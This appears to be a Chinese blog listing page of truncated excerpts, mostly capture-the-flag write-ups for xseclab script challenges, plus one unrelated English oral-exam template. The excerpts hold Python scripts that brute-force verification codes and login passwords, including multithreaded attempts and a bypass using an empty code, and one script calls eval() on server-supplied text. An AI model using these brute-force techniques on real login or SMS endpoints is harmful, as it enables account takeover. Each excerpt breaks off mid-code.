思路:暴力破解3位纯数字的验证码 坑:在破解前,需要用脚本模拟点击获取验证码的链接,正如实际情况那样,服务器要先发送验证码,你才能开始输入验证码,否则服务器怎么知道你这验证码是不是正确的呢? #coding=utf-8 from http import cookies import requests; from lxml import etree #解析html页面的包 import threading curtask = 100 maxtask = 999 flag = False lock = threading.Lock() url = "http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901" s = requests.session() r1 = s.get(url) url3 = "http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901/vcode.php" r = s.post(url=url3,data={ ....

网络安全实验室(脚本区 逗比验证码第二期)
很无语的解题思路:验证码使用一次后就会失效,这句话意思是不需要使用验证码也可以,即验证码为空串。所以表单中vcode="" 更快的暴力方法是用多线程 代码参考https://www.freesion.com/article/53961309685/ import requests, threading url = 'http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/index.php' login = 'http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/login.php' header = {'Referer': 'http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/index.php', 'Connection': 'keep-alive', 'Upgrade-Insecure-Requests': '1'} s = requests.session....

网络安全实验室(脚本区 逗比验证码第一期)
解决本题的关键是维护同一个账号的会话(session),这样验证码就可以确定下来。 先获取到验证码的地址(在r1.text中),手动输入验证码vode,再进行密码爆破 #coding=utf-8 from http import cookies import requests; from lxml import etree #解析html页面的包 if __name__ == "__main__": url = "http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/index.php" s = requests.session() r1 = s.get(url) print(r1.text) vcode = input() url2 = "http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/login.php" for i in range(1000, 10000): res = s.post(url = url2, data={ 'u....

网络安全实验室(脚本区 快速口算题)
#coding=utf-8 from http import cookies import requests; from lxml import etree #解析html页面的包 if __name__ == "__main__": url = "http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php" html = requests.get(url) cookie = html.cookies tree = etree.HTML(html.text) #将html解析成树结构 calculate = tree.xpath("/html/body/form/text()[2]")[0] #取出表达式字段 cal = calculate.replace(' ','').replace('=','') #删除空格和等号 result = eval(cal) #使用库函数计算表达式 #带着计算结果提交,注意需要带上cookie,这样才能保证获得运算式的和提交结果的是同一个用户 res = request....

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内容是我参照空卡英语口语模板写的,准备10来个就行了。 1 你有什么兴趣爱好 Q:关键词:hobby, interest What are you interested in ? / Do you have any hobbies? A: I am pasionnate about music since I was a child. I love music because it makes me happy and relaxing. So I think it is dispensable for my life. In order to improve my skills, I learned to play the guitar by myself when I graduated from junior high school.Even if sometimes I am busy with my studies, I will still practice playing the guitar and singing. I believe music will be m....

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